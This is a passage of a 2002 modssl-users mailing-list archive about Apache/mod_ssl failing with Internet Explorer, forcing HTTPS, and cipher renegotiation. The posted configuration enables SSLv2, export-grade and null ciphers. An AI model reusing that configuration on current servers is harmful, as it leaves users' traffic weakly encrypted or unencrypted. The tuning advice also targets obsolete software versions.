I found out that there are many problems with MSIE, and I did all
the fixes. Here are parts of my httpd.conf. Does anyone has an idea?
Apache-Version 1.3.20
mod_ssl Version 2.8.4
openssl Version 0.96b
PHP Version Pear 4.1.0
MySQL Version 3.21
 
[...]
SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
 
<VirtualHost _default_:443>
SSLEngine on
 
#*** here I tried both versions .... no change
#SSLProtocol ALL -SSLv3 
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
 
SSLVerifyClient none
 
<Files ~ "\.(cgi|shtml|phtml|php3|php?)$">
    SSLOptions +StdEnvVars
</Files>
<Directory "/usr/local/httpd/cgi-bin">
    SSLOptions +StdEnvVars
</Directory>
 
#*** here I tried both versions .... no change
#SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0
BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0
BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown
------_=_NextPart_001_01C19AD6.6F62F680-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 13 13:55:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA14976; Sun, 13 Jan 2002 13:54:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tpau.muc.eurocyber.net id NAA14954; Sun, 13 Jan 2002 13:53:33 +0100 (MET) Received: from gamestation ([195.143.212.90]) by tpau.muc.eurocyber.net (8.11.3/8.11.3/tpau-1.0) with SMTP id g0DCrUB88623 for ; Sun, 13 Jan 2002 13:53:30 +0100 (CET) Message-ID: <01d901c19c31$938545c0$5ad48fc3@gamestation> From: "Dr. Peter Kanyion - Pnetlinks.com" To: References: <8A87A19E6153D4119FA800508BDF0932E0E260@USHEM202> Subject: public key technology resiurces Date: Sun, 13 Jan 2002 13:55:21 +0100 Organization: Kanyion Consulting MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_01D6_01C19C39.F1349AB0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Dr. Peter Kanyion - Pnetlinks.com" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_01D6_01C19C39.F1349AB0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I'm currently researching on public key technology and will appreciate = any resource pointers that anyone could provide. Thanks. Peter ----- Original Message -----=20 From: Kuczborski, Carol L=20 To: 'modssl-users@modssl.org'=20 Sent: Friday, January 11, 2002 8:30 PM Subject: RE: Problems with Apache / mod_ssl and Internet Explorer 5/6 I had this problem and spent many, many hours researching. In my = research, I came across many others with the same problem. So you are = not the only one. I received the "Page cannot be displayed" error along = with "Cannot find server or DNS error". I tried the fix suggested in = the Apache mod_ssl FAQ (change to http.conf file to downgrade to http = 1.0). It did not work. It looks like you also tried the fix, too. I = filed a bug report in the Bug Database for Apache mod_ssl and never = received any response in over 5 months. I eventually worked with Oracle = Worldwide Support because I was using the Apache Web Server and mod_ssl = as packaged with the Oracle9i Application Server. I had to work up = through the ranks to get the problem addressed. Eventually, I = implemented two changes that seemed to reduce the error with much, much = less frequency. I still get the error, but not very often. It looks like you have also tried one of the solutions I implemented = (change to http.conf file removing 'nokeepalive'). The other fix I = implemented, Oracle actually had to patch a DLL file of theirs that I = believe works with the mod_ssl component. Anyways, I saw the code fix = they implemented and it has something to do with retrying the read from = the port when it fails to read the data (they enclosed the read in a = "retry" loop until successful). I don't know if this information will = help. But, I am providing the details: =20 I received this error in two different cases. One case it happened = intermittently on almost any page I tried to access from our website = using SSL and the IE browser. I reduced the errors, quite significantly, = but not entirely, by making the following change in the Apache http.conf = file: From: #SetEnvIf User-Agent ".*MSIE.*" nokeepalive = ssl-unclean-shutdown To: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown In the other case, I always received the error when I tried to use = Oracle Portal's Add-Item-Wizard pages to upload a document to Oracle = Portal's Content Area. Here was the resolution for that case: Implemented solution for Oracle Bug No. 1821195 (When uploading = large file using modplsql & SSL error reading data from client) by = replacing the existing ApacheModuleSSL.dll file with the patched file = referenced in the bug details. According to the details for the = ApacheModuleSSL.dll patch, there was mention of a bug in the "select" = function in Windows NT 4.0: "When checking a socket, if data can be read without blocking, = select () returns yes, but when actually reading from the socket with = recv(), that function returns WSAEWOULDBLOCK, which says that reading = would block. It seems that this problem does not occur in usual = operation, but only in an SSL enabled Apache (modssl or apache-ssl) with = https. The code for WIN32, which handles writing to a socket, already = contains a workaround for this. The code for reading from a socket did = not have a workaround."=20 Carol Kuczborski=20 EDS - Enabling Business Solutions=20 MS A6N-B47=20 13600 EDS Drive=20 Herndon, VA 20171=20 -----Original Message----- From: Marcel.Selhorst@t-online.de [mailto:Marcel.Selhorst@t-online.de] Sent: Friday, January 11, 2002 2:01 PM To: modssl-users@modssl.org Subject: Problems with Apache / mod_ssl and Internet Explorer 5/6 Hi everyone, I=B4ve got a big problem: I installed on SuSE Linux 7.3 the Apache Web Server including the mod_ssl in order to run a secured webinterface for my IMAP-Server... Unsecured everything works just fine in every Browser. After installing the SSL-Plugin I generated a custom certificate and = everything works fine with Netscape / Konquerer / w3m. But when I try to connect via https with any version of Microsofts Internet Explorer I get the message, that the page cannot be displayed. I found out that there are many problems with MSIE, and I did all the fixes. Here are parts of my httpd.conf. Does anyone has an idea? Apache-Version 1.3.20 mod_ssl Version 2.8.4 openssl Version 0.96b PHP Version Pear 4.1.0 MySQL Version 3.21 [...] SSLPassPhraseDialog builtin SSLSessionCache dbm:/var/run/ssl_scache SSLSessionCacheTimeout 300 SSLRandomSeed startup builtin SSLRandomSeed connect builtin SSLEngine on #*** here I tried both versions .... no change #SSLProtocol ALL -SSLv3=20 SSLCipherSuite = ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLVerifyClient none SSLOptions +StdEnvVars SSLOptions +StdEnvVars #*** here I tried both versions .... no change #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown = downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown = downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown ------=_NextPart_000_01D6_01C19C39.F1349AB0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi,
 
I'm currently researching on = public key=20 technology and will appreciate any resource = pointers=20 that anyone could provide.
 
Thanks.
Peter
----- Original Message -----
From:=20 Kuczborski, Carol L =
Sent: Friday, January 11, 2002 = 8:30=20 PM
Subject: RE: Problems with = Apache /=20 mod_ssl and Internet Explorer 5/6

I = had this=20 problem and spent many, many hours researching.  In my research, = I came=20 across many others with the same problem.  So you are not the = only=20 one.  I received the "Page cannot be displayed" error along with = "Cannot=20 find server or DNS error".  I tried the fix suggested = in the=20 Apache mod_ssl FAQ (change to http.conf file to downgrade to http = 1.0). =20 It did not work.  It looks like you also tried the fix, too. I = filed a=20 bug report in the Bug Database for Apache mod_ssl and never received = any=20 response in over 5 months.  I eventually worked with Oracle = Worldwide=20 Support because I was using the Apache Web Server and mod_ssl as = packaged with=20 the Oracle9i Application Server.  I had to work up through=20 the ranks to get the problem addressed.  Eventually, I=20 implemented two changes that seemed to reduce the error with much, = much=20 less frequency.  I still get the error, but not=20 very often.

It = looks like you=20 have also tried one of the solutions I implemented (change to = http.conf file=20 removing 'nokeepalive').  The other fix I implemented, = Oracle=20 actually had to patch a DLL file of theirs that I believe works with = the=20 mod_ssl component.  Anyways, I saw the code fix they = implemented and=20 it has something to do with retrying the read from the port when it = fails to=20 read the data (they enclosed the read in a "retry" loop until=20 successful).  I don't know if this information will help.  = But,=20 I am providing the details:  

I received this error in two different cases. One case it = happened=20 intermittently on almost any page I tried to access from our website = using=20 SSL and the IE browser. I reduced the errors, quite significantly, = but not=20 entirely, by making the following change in the Apache http.conf = file:

From: #SetEnvIf User-Agent ".*MSIE.*" nokeepalive=20 ssl-unclean-shutdown

To: SetEnvIf User-Agent ".*MSIE.*" ssl-unclean-shutdown

In the other case, I always received the error when I tried to = use Oracle=20 Portal's Add-Item-Wizard pages to upload a document to Oracle = Portal's=20 Content Area. Here was the resolution for that case:

Implemented solution for Oracle Bug No. 1821195 (When uploading = large=20 file using modplsql & SSL error reading data from client) by = replacing=20 the existing ApacheModuleSSL.dll file with the patched file = referenced in=20 the bug details. According to the details for the = ApacheModuleSSL.dll patch,=20 there was mention of a bug in the "select" function in Windows NT = 4.0:

"When checking a socket, if data can be read without blocking, = select ()=20 returns yes, but when actually reading from the socket with recv(), = that=20 function returns WSAEWOULDBLOCK, which says that reading would = block. It=20 seems that this problem does not occur in usual operation, but only = in an=20 SSL enabled Apache (modssl or apache-ssl) with https. The code for = WIN32,=20 which handles writing to a socket, already contains a workaround for = this.=20 The code for reading from a socket did not have a workaround."=20

Carol=20 Kuczborski
EDS - = Enabling Business=20 Solutions
MS A6N-B47 =
13600 EDS Drive
Herndon, VA 20171

-----Original = Message-----
From:=20 Marcel.Selhorst@t-online.de=20 [mailto:Marcel.Selhorst@t-online.de]
Sent: Friday, January = 11, 2002=20 2:01 PM
To: modssl-users@modssl.org
Subject: = Problems with=20 Apache / mod_ssl and Internet Explorer 5/6

Hi everyone,
 
I=B4ve got a big = problem:
I installed on SuSE Linux 7.3 the = Apache Web=20 Server including
the mod_ssl in order to run a = secured=20 webinterface for my
IMAP-Server...
Unsecured everything works just = fine in every=20 Browser.
After installing the SSL-Plugin I = generated a=20 custom certificate and everything
works fine with Netscape / = Konquerer /=20 w3m.
But when I try to connect via https with any version of=20 Microsofts
Internet Explorer I get the = message, that the=20 page cannot be
displayed.
I found out that there are many = problems with=20 MSIE, and I did all
the fixes. Here are parts of my = httpd.conf.=20 Does anyone has an idea?
Apache-Version 1.3.20
mod_ssl Version 2.8.4
openssl Version 0.96b
PHP Version Pear 4.1.0
MySQL Version 3.21
 
[...]
SSLPassPhraseDialog  = builtin
SSLSessionCache         = dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  = 300
SSLRandomSeed startup = builtin
SSLRandomSeed=20 connect builtin
 
<VirtualHost = _default_:443>
SSLEngine=20 on
 
#*** here I tried both versions = .... no=20 change
#SSLProtocol ALL = -SSLv3 
SSLCipherSuite=20 = ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
 
SSLVerifyClient none
 
<Files ~=20 "\.(cgi|shtml|phtml|php3|php?)$">
    = SSLOptions=20 +StdEnvVars
</Files>
<Directory=20 "/usr/local/httpd/cgi-bin">
    SSLOptions=20 +StdEnvVars
</Directory>
 
#*** here I tried both versions = .... no=20 change
#SetEnvIf User-Agent ".*MSIE.*" = nokeepalive=20 ssl-unclean-shutdown downgrade-1.0 = force-response-1.0
BrowserMatch "MSIE=20 [1-4]" nokeepalive ssl-unclean-shutdown downgrade-1.0=20 force-response-1.0
BrowserMatch "MSIE [5-9]"=20 = ssl-unclean-shutdown
= ------=_NextPart_000_01D6_01C19C39.F1349AB0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Jan 13 22:50:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA14371; Sun, 13 Jan 2002 22:49:37 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from nsk.yi.org id WAA14330; Sun, 13 Jan 2002 22:48:52 +0100 (MET) Received: (from strange@localhost) by nsk.yi.org (8.11.6/8.11.6) id g0DLoLd04779 for modssl-users@modssl.org; Sun, 13 Jan 2002 21:50:21 GMT Date: Sun, 13 Jan 2002 21:50:21 +0000 From: Luciano Miguel Ferreira Rocha To: modssl-users@modssl.org Subject: Re: public key technology resiurces Message-ID: <20020113215021.A4635@nsk.yi.org> References: <8A87A19E6153D4119FA800508BDF0932E0E260@USHEM202> <01d901c19c31$938545c0$5ad48fc3@gamestation> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <01d901c19c31$938545c0$5ad48fc3@gamestation>; from pkanyion@pnetlinks.com on Sun, Jan 13, 2002 at 01:55:21PM +0100 Disclaimer: 'Author of this message is not responsible for any harm done to reader's computer.' Organization: 'NSK' Section: 'Admin' Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Luciano Miguel Ferreira Rocha X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users There's a lot of information about cryptography in RSA Labs' site: http://www.rsasecurity.com/rsalabs/ The standards on public key (PKCS) can be found here: http://www.rsasecurity.com/rsalabs/pkcs/index.html Regards, Luciano Rocha ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 14 12:54:53 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA18135; Mon, 14 Jan 2002 12:53:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1-gui.server.ntli.net id MAA17921; Mon, 14 Jan 2002 12:51:20 +0100 (MET) Received: from simonp90pc ([213.107.76.160]) by mail1-gui.server.ntli.net (Post.Office MTA v3.1 release PO203a ID# 0-33929U70000L2S50) with SMTP id AAA24469 for ; Mon, 14 Jan 2002 11:51:13 +0000 From: "Simon Ritchie" To: Subject: RE: force to use SSL when accessing certain directory/url? Date: Mon, 14 Jan 2002 11:52:06 -0000 Message-ID: <004701c19cf1$e3992340$0200a8c0@home> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Simon Ritchie" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I guess that you want to refuse access to a page by HTTP, ftp etc, so that it can only be accessed via HTTPS. Is that correct? You can do that with the apache rewrite mechanism. The rewrite guide shows how. Simon > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Zhang, Li > Sent: 07 January 2002 19:37 > To: 'modssl-users@modssl.org' > Subject: force to use SSL when accessing certain directory/url? > > > Hi mod-ssl guru: > > It is easy to do this in IIS but for Apache/mod_ssl how can I force the > browser to use https when a user is trying to access a url via http? I'm > using Apache 1.3.22 + mod_ssl. > > For example: > > the user is trying to access: http://myhost/secure/index.html > The server forces to use https://myhost/secure/index.html > > /secure is pointing to c:/mysecureweb > > I appreciate if you can give me a sample config file. > > Thanks. > > Li > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 14 13:04:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA18725; Mon, 14 Jan 2002 13:03:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id NAA18680; Mon, 14 Jan 2002 13:02:28 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g0EAIlr31220 for ; Mon, 14 Jan 2002 10:19:08 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Mon, 14 Jan 2002 10:20:55 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F01886CEC@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: Problems with Apache / mod_ssl and Internet Explorer 5/6 Date: Mon, 14 Jan 2002 10:21:06 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C19CE5.2D7794E0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C19CE5.2D7794E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I'd suggest you try this for SSLSessionCache instead: =20 SSLSessionCache shm:logs/ssl_scache(512000) =20 It seems to fix it for most users. =20 - John Airey Internet systems support officer, ITCSD, Royal National Institute for = the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 = John.Airey@rnib.org.uk Agnostic (Greek) =3D Ignoramus (Latin) -----Original Message----- From: Marcel.Selhorst@t-online.de [mailto:Marcel.Selhorst@t-online.de] Sent: 11 January 2002 19:01 To: modssl-users@modssl.org Subject: Problems with Apache / mod_ssl and Internet Explorer 5/6 Hi everyone, =20 I=B4ve got a big problem: I installed on SuSE Linux 7.3 the Apache Web Server including the mod_ssl in order to run a secured webinterface for my IMAP-Server... Unsecured everything works just fine in every Browser. After installing the SSL-Plugin I generated a custom certificate and everything works fine with Netscape / Konquerer / w3m. But when I try to connect via https with any version of Microsofts Internet Explorer I get the message, that the page cannot be displayed. I found out that there are many problems with MSIE, and I did all the fixes. Here are parts of my httpd.conf. Does anyone has an idea? Apache-Version 1.3.20 mod_ssl Version 2.8.4 openssl Version 0.96b PHP Version Pear 4.1.0 MySQL Version 3.21 =20 [...] SSLPassPhraseDialog builtin SSLSessionCache dbm:/var/run/ssl_scache SSLSessionCacheTimeout 300 SSLRandomSeed startup builtin SSLRandomSeed connect builtin =20 SSLEngine on =20 #*** here I tried both versions .... no change #SSLProtocol ALL -SSLv3=20 SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL =20 SSLVerifyClient none =20 SSLOptions +StdEnvVars SSLOptions +StdEnvVars =20 #*** here I tried both versions .... no change #SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [1-4]" nokeepalive ssl-unclean-shutdown = downgrade-1.0 force-response-1.0 BrowserMatch "MSIE [5-9]" ssl-unclean-shutdown -=20 NOTICE: The information contained in this email and any attachments is=20 confidential and may be legally privileged. If you are not the=20 intended recipient you are hereby notified that you must not use,=20 disclose, distribute, copy, print or rely on this email's content. If=20 you are not the intended recipient, please notify the sender=20 immediately and then delete the email and any attachments from your=20 system. RNIB has made strenuous efforts to ensure that emails and any=20 attachments generated by its staff are free from viruses. However, it=20 cannot accept any responsibility for any viruses which are=20 transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email=20 and any attachments are those of the author and do not necessarily=20 represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk=20 ------_=_NextPart_001_01C19CE5.2D7794E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I'd=20 suggest you try this for SSLSessionCache instead:
 
SSLSessionCache     =    =20 shm:logs/ssl_scache(512000)
 
It=20 seems to fix it for most users.
 

-
John Airey
Internet systems support officer, = ITCSD,=20 Royal National Institute for the Blind,
Bakewell Road, Peterborough = PE2=20 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848=20 John.Airey@rnib.org.uk

Agnostic (Greek) =3D Ignoramus=20 (Latin)

-----Original Message-----
From: = Marcel.Selhorst@t-online.de=20 [mailto:Marcel.Selhorst@t-online.de]
Sent: 11 January 2002=20 19:01
To: modssl-users@modssl.org
Subject: = Problems with=20 Apache / mod_ssl and Internet Explorer 5/6

Hi everyone,
 
I=B4ve got a big = problem:
I installed on SuSE Linux 7.3 the = Apache Web=20 Server including
the mod_ssl in order to run a = secured=20 webinterface for my
IMAP-Server...
Unsecured everything works just fine = in every=20 Browser.
After installing the SSL-Plugin I = generated a=20 custom certificate and everything
works fine with Netscape / Konquerer = /=20 w3m.
But when I try to connect via https with any version of=20 Microsofts
Internet Explorer I get the message, = that the=20 page cannot be
displayed.
I found out that there are many = problems with=20 MSIE, and I did all
the fixes. Here are parts of my = httpd.conf. Does=20 anyone has an idea?
Apache-Version 1.3.20
mod_ssl Version 2.8.4
openssl Version 0.96b
PHP Version Pear 4.1.0
MySQL Version 3.21
 
[...]
SSLPassPhraseDialog  = builtin
SSLSessionCache        = =20 dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  = 300
SSLRandomSeed startup = builtin
SSLRandomSeed=20 connect builtin
 
<VirtualHost = _default_:443>
SSLEngine=20 on
 
#*** here I tried both versions .... = no=20 change
#SSLProtocol ALL = -SSLv3 
SSLCipherSuite=20 = ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL<= /DIV>
 
SSLVerifyClient none
 
<Files ~=20 "\.(cgi|shtml|phtml|php3|php?)$">
    SSLOptions = +StdEnvVars
</Files>
<Directory=20 "/usr/local/httpd/cgi-bin">
    SSLOptions=20 +StdEnvVars
</Directory>
 
#*** here I tried both versions .... = no=20 change
#SetEnvIf User-Agent ".*MSIE.*" = nokeepalive=20 ssl-unclean-shutdown downgrade-1.0 force-response-1.0
BrowserMatch = "MSIE=20 [1-4]" nokeepalive ssl-unclean-shutdown downgrade-1.0=20 force-response-1.0
BrowserMatch "MSIE [5-9]"=20 ssl-unclean-shutdown

-


NOTICE: The information contained = in this email and any attachments is

confidential and may be legally = privileged. If you are not the

intended recipient you are hereby = notified that you must not use,

disclose, distribute, copy, print = or rely on this email's content. If

you are not the intended recipient, = please notify the sender

immediately and then delete the = email and any attachments from your

system.


RNIB has made strenuous efforts to = ensure that emails and any

attachments generated by its staff = are free from viruses. However, it

cannot accept any responsibility = for any viruses which are

transmitted. We therefore recommend = you scan all attachments.


Please note that the statements and = views expressed in this email

and any attachments are those of = the author and do not necessarily

represent those of = RNIB.


RNIB Registered Charity Number: = 226227


Website: http://www.rnib.org.uk =


------_=_NextPart_001_01C19CE5.2D7794E0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 14 13:06:30 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA18803; Mon, 14 Jan 2002 13:05:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail1-gui.server.ntli.net id NAA18767; Mon, 14 Jan 2002 13:04:28 +0100 (MET) Received: from simonp90pc ([213.107.76.160]) by mail1-gui.server.ntli.net (Post.Office MTA v3.1 release PO203a ID# 0-33929U70000L2S50) with SMTP id AAA26540 for ; Mon, 14 Jan 2002 12:04:26 +0000 From: "Simon Ritchie" To: Subject: RE: Connection re-negotiation Date: Mon, 14 Jan 2002 12:05:18 -0000 Message-ID: <004801c19cf3$bbc01c00$0200a8c0@home> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Simon Ritchie" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I hit a more fundamental problem with IE. According to me, it doesn't support the keepalive messages that are needed to keep an SSL connection open, so the connection dies when the keepalive timeout kicks in - by default after one minute. This means that unless you request a new page every minute, the connection dies and your browser has to renegotiate the whole thing from scratch. If the server mandates a 128-bit connection for the next page, then the problem that you are asking about goes away. However, the cost of negotiating a new connection on every request is high. In the default configuration, Apache sets keepalive off if the browser is IE, but it appears that this just forces renegotiation on every request. Can anybody confirm that all this is correct? If so, is there a way to get around it (other than using another browser)? Simon > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of MATHIHALLI,MADHUSUDAN > (HP-Cupertino,ex1) > Sent: 08 January 2002 01:11 > To: 'modssl-users@modssl.org' > Subject: Connection re-negotiation > > > Hi mod_ssl gurus, > I had a small question regarding connection re-negotiation : > > The scenario is that I have a 56-bit browser (IE 6.0) and a 128/168 bit > enabled apache (+mod_ssl 2.8.4) server.. During a https transaction, the > browser > establishes 56-bit connection, but then inorder to access a particular > location, a 128 bit connection is mandated by the server (using the > SSLRequire option).. Is it possible that the client can upgrade the > connection to a 128-bit one ??.. If yes, how to achieve that ?.. > > -Madhu > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 14 19:04:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16024; Mon, 14 Jan 2002 19:03:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from statler.squaretrade.com id TAA15989; Mon, 14 Jan 2002 19:02:51 +0100 (MET) Received: from glen by statler.squaretrade.com with local (Exim 3.33 #1 (Debian)) id 16QBDX-0005TN-00 for ; Mon, 14 Jan 2002 09:48:19 -0800 Date: Mon, 14 Jan 2002 09:48:19 -0800 To: modssl-users@modssl.org Subject: Re: force to use SSL when accessing certain directory/url? Message-ID: <20020114174819.GB20562@squaretrade.com> References: <004701c19cf1$e3992340$0200a8c0@home> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <004701c19cf1$e3992340$0200a8c0@home> User-Agent: Mutt/1.3.25i From: Glen Mehn Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Glen Mehn X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users you could also setup your ssl virtualhost with an different DocumentRoot, only available by https (port 443) and leave your https pages there. On Mon, Jan 14, 2002 at 11:52:06AM -0000, Simon Ritchie wrote: > I guess that you want to refuse access to a page by HTTP, ftp etc, so that > it can only be accessed via HTTPS. Is that correct? You can do that with > the apache rewrite mechanism. The rewrite guide shows how. > > Simon > > > > -----Original Message----- > > From: owner-modssl-users@modssl.org > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Zhang, Li > > Sent: 07 January 2002 19:37 > > To: 'modssl-users@modssl.org' > > Subject: force to use SSL when accessing certain directory/url? > > > > > > Hi mod-ssl guru: > > > > It is easy to do this in IIS but for Apache/mod_ssl how can I force the > > browser to use https when a user is trying to access a url via http? I'm > > using Apache 1.3.22 + mod_ssl. > > > > For example: > > > > the user is trying to access: http://myhost/secure/index.html > > The server forces to use https://myhost/secure/index.html > > > > /secure is pointing to c:/mysecureweb > > > > I appreciate if you can give me a sample config file. > > > > Thanks. > > > > Li > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Glen S Mehn Lead Systems Administrator SquareTrade, Inc glen@squaretrade.com Building Trust in Transactions (sm) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 14 19:07:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA16178; Mon, 14 Jan 2002 19:06:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from palrel11.hp.com id TAA16120; Mon, 14 Jan 2002 19:05:08 +0100 (MET) Received: from xparelay2.corp.hp.com (xparelay2.corp.hp.com [15.58.137.112]) by palrel11.hp.com (Postfix) with ESMTP id 00100E0027A for ; Mon, 14 Jan 2002 10:05:01 -0800 (PST) Received: from xpabh4.corp.hp.com (xpabh4.corp.hp.com [15.58.136.1]) by xparelay2.corp.hp.com (Postfix) with ESMTP id 7D78F400092 for ; Mon, 14 Jan 2002 10:04:20 -0800 (PST) Received: by xpabh4.corp.hp.com with Internet Mail Service (5.5.2653.19) id ; 